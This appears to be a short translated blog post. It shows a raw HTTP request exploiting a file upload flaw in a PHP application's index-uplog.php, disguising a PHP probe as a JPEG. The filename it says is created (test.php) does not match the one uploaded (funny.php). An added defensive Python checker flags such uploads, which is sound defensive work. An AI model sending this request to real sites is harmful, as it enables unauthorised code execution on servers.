I researched this bug a long time ago and have forgotten it by now; I ran into it on a target site today, so I'm writing it down.
Payload:
```http
POST /source/pack/upload/index-uplog.php HTTP/1.1
Host: 127.0.0.1
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryZWa8hDK6XlSEJhi7
Accept: */*
Accept-Language: zh-CN,zh;q=0.9
Content-Length: 322

------WebKitFormBoundaryZWa8hDK6XlSEJhi7
Content-Disposition: form-data; name="app"; filename="funny.php"
Content-Type: image/jpeg

<?php phpinfo();;unlink(__FILE__);?>
------WebKitFormBoundaryZWa8hDK6XlSEJhi7
Content-Disposition: form-data; name="time"

test
------WebKitFormBoundaryZWa8hDK6XlSEJhi7--
```
After hitting Go, a test.php file is created under /data/tmp/.
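A defender-side check for the request above, as an added example that is not part of the original post: it parses a multipart body and flags file parts whose filename, declared Content-Type and actual content disagree, which is the pattern in this payload. The function name `inspect_upload`, the extension list and the magic-byte table are assumptions of this example.

```python
import re
from email import policy
from email.parser import BytesParser

# Magic bytes for the image types an upload form would normally accept.
IMAGE_MAGIC = {
    "image/jpeg": (b"\xff\xd8\xff",),
    "image/png": (b"\x89PNG\r\n\x1a\n",),
    "image/gif": (b"GIF87a", b"GIF89a"),
}
SCRIPT_EXT = re.compile(r"\.(php\d?|phtml|phar|pht)$", re.I)  # assumed list
SCRIPT_TAG = re.compile(rb"<\?(php|=)", re.I)

def inspect_upload(content_type: str, body: bytes) -> list[str]:
    """Return one finding per suspicious property of each uploaded file part."""
    raw = b"Content-Type: " + content_type.encode() + b"\r\n\r\n" + body
    msg = BytesParser(policy=policy.default).parsebytes(raw)
    findings = []
    for part in msg.iter_parts():
        name = part.get_filename()
        if name is None:  # ordinary form field such as "time"
            continue
        data = part.get_payload(decode=True) or b""
        declared = part.get_content_type()
        if SCRIPT_EXT.search(name):
            findings.append(f"{name}: server-executable extension")
        magic = IMAGE_MAGIC.get(declared)
        if magic and not data.startswith(magic):
            findings.append(f"{name}: declared {declared} but no image signature")
        if SCRIPT_TAG.search(data):
            findings.append(f"{name}: PHP open tag in content")
    return findings

# Constructed sample: the multipart body shape of the request on this page.
CT = "multipart/form-data; boundary=----WebKitFormBoundaryZWa8hDK6XlSEJhi7"
BOUNDARY = b"------WebKitFormBoundaryZWa8hDK6XlSEJhi7"
SAMPLE = b"\r\n".join([
    BOUNDARY, b'Content-Disposition: form-data; name="app"; filename="funny.php"',
    b"Content-Type: image/jpeg", b"", b"<?php phpinfo();;unlink(__FILE__);?>",
    BOUNDARY, b'Content-Disposition: form-data; name="time"', b"", b"test",
    BOUNDARY + b"--", b"",
])

if __name__ == "__main__":
    for finding in inspect_upload(CT, SAMPLE):
        print(finding)
```

The same function can sit in a WAF hook or be run over captured request bodies; the durable fix remains server-side validation of extension and content plus a non-executable upload directory.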
I won't post the batch script; if you're interested, join the Planet (星球) group to discuss.